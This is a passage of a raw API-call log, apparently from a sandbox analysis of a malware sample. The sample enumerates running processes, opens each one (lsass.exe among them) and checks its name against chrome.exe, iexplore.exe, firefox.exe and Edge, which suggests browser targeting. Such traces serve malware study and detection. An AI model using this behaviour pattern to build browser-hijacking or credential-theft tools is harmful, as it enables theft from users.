	[0222.608] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x5458
	[0222.608] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.609] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0222.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.609] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.609] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0222.609] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.609] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.610] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0222.610] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x545c
	[0222.610] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.610] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0222.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.611] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.611] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0222.611] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.611] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.611] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.612] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x5460
	[0222.612] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.612] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.613] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.613] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.613] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.613] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.614] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.614] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x5464
	[0222.614] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.614] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.615] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.615] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.615] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.615] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.616] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.616] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x5468
	[0222.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.617] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.617] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.617] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.617] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.618] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.618] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.618] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x546c
	[0222.618] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.619] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.619] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.619] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.619] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.619] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.620] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.620] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x5470
	[0222.620] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.621] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.621] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.621] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.621] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.621] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.622] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.622] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x5474
	[0222.622] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.623] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.623] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.623] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.623] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.623] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.624] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.624] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x5478
	[0222.624] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.624] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.625] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.625] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.625] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.625] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.626] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0222.626] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x547c
	[0222.626] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.626] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0222.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.627] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.627] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0222.627] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.627] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.628] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.629] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x5480
	[0222.629] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.629] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.630] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.630] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.630] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.630] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.631] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0222.631] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x5484
	[0222.631] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.631] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.632] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.632] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.632] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.633] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.633] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.633] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0222.634] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x5488
	[0222.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.634] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0222.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.634] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.634] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.634] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0222.635] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.635] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.635] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0222.635] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x548c
	[0222.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.636] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0222.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.636] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.636] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.636] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0222.637] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.637] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.637] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0222.637] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x5490
	[0222.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.638] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0222.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.638] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.638] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.638] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0222.639] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.639] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.639] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0222.639] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x5494
	[0222.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.640] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0222.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.640] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.640] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.640] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0222.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.641] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.641] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0222.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x5498
	[0222.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.642] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0222.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.642] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.642] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0222.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.642] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.642] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0222.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x549c
	[0222.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.643] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0222.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.644] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.644] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0222.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.645] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.645] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0222.646] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0222.646] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0222.646] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x54a0
	[0222.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.646] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0222.647] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.647] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.648] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0222.648] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.648] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.649] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0222.649] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x54a4
	[0222.649] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.649] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0222.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.650] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.650] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0222.650] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.650] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.651] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0222.651] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x54a8
	[0222.651] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.651] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0222.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.652] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.652] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0222.652] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.652] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.652] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0222.653] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x54ac
	[0222.653] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.653] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0222.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.654] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.654] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0222.654] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.654] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.655] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0222.656] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x54b0
	[0222.656] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.656] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0222.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.657] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.657] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.657] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0222.658] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.658] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.658] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0222.659] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x54b4
	[0222.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.659] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0222.659] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.660] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0222.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.660] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0222.660] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.660] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0222.660] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0222.661] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x54b8
	[0222.661] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.661] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0222.662] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0222.662] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
